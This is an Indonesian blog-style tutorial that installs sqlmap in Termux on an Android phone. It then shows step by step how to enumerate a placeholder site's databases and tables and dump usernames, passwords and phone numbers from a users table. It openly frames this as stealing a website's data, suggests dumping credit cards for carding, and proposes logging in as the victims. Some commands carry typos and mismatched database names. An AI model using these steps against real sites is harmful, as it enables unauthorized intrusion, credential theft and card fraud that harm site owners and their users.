Learning Sqlmap with Termux

Ok, Hari Ini saya akan sharing tutorial sql injection with Tools Sql Map Untuk Melakukan Peretasan Atau Serangan Pada Website berbasis data dengan tujuan menemukan kerentanan Keamanan(Vulnerability) pada website tersebut.

SQLMAP adalah tools opensource yang mendeteksi dan melakukan exoloit pada bug SQL injection secara otomatis. Dengan melakukan seranggan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

Maka Dari itu, kita bisa mencuri atau mengambil database dari sebuah website yang kita inginkan, tapi harus yang vulnerable ( memiliki celah ) agar bisa di masuki, karna dari celahnya tersebut kita bisa melihat data – data nya, dan belum pasti semua data, dan keberuntungan juga di perlukan :v.

   Dan jika saja kita lagi beruntung, kita bisa saja mendapat CC ( Credit Card / kartu kredit ) bagi yang suka carding, bisa dump cc disini hehe..

Baik, Intronya cukup segitu saja, dan mari langsung menjalankan Tools nya..

~Saya Tidak Bertanggung Jawab Dengan Kesalahan Yang Anda Lakukan~

Ok.. langsung saja kita Jalankan

Bahan- bahan yang di butuhkan :

~HP Dengan Versi Lolipop Ke Atas ( versi 5.0 + )

~Aplikasi Termux ( Termux hanya bisa di HP Versi Lolipop Ke Atas )

~Koneksi Internet Lancar

~Kesabaran :V , Soalnya Perlu pengumpulan Database Nanti, Dan Untuk Cepat Lambat nya, bergantung koneksi internet anda beserta database website nya hehe.

  Yang Pertama :

Buka Aplikasi Termux

~ Kalau sudah, kita update dulu package nya dengan perintah :

     $apt update –y

~ Lanjut dengan Menginstall Python

     $apt  install python python2 –y

~ Lanjut dengan menginstall git agar bisa cloning

     $apt install git

~ Sekarang eksekusi Tool nya

     $git clone https://github.com/sqlmapproject/sqlmap

~ Lanjut masuk ke directory Tool

     $cd sqlmap

~ Sekarang jalankan..

     $python2 sqlmap.py

Nahh… Kita Sudah siap Untuk menginstall SQLMAP, skrang tinggal cara penggunaan. :

Kita buat contoh website target : http://www.contoh.com/product.php?id=1

Ok, Itu sebagai  contoh Untuk kita masuki database nya..

 $python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 --dbs

Dan tekan Enter..

Kalau vuln, Nanti akan Di tunjukkan nama” Database nya, contoh :

*information_schema

*sdgsd4484sd

Nah itulah contoh database nya, Kita buka database

*sdgsd4488sd

Karena yang information_schema nggak ada gunanya :v

Lanjut untuk membuka, ketik perintah :

$python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 –D asgsd4488sd –tables

Nanti akan di beikan informasi” dalam bentuk table, beserta nama- nama dalam table nya,  tapi belum cukup, kita harus membuka lebih dalam lagi..

$ $python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 -D

Asgsd4488sd –T users --columns

Untuk memberikan dalam bentuk Kolom Dari Tabel users, maka disitu nanti akan tertera apa aja yg ada di dalam table nya, tapi biasanya yang ada : email, phone, username, password, phone

Nah tinggal kita dump untuk mengetahui username dan password nya

$ python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 -D

Asgsd4488sd –T users –C username,password,phone –dump

Kalau sudah, nanti akan diberikan Username , password, dan nomor hp, jad itinggal kita masukkan ke website tersebut dan kita sudah bisa memasuki sebagai user ( pengguna )

·        --dbs         = Untuk memberikan Database

·        -D             = Nama Database nya

·        -u              = URL dari website yang mau di dump

·        --tables     = Untuk memberikan nama – nama table

·        -T              = Nama Tabel

·        --columns = Untuk memberikan data yang ada pada table

·        -C             = Nama – nama di dalam kolom

·        --dump     = proses akhir untuk mendapatkan username, password   

                        dan Nomor Handphone

Sekian dari saya, terimakasih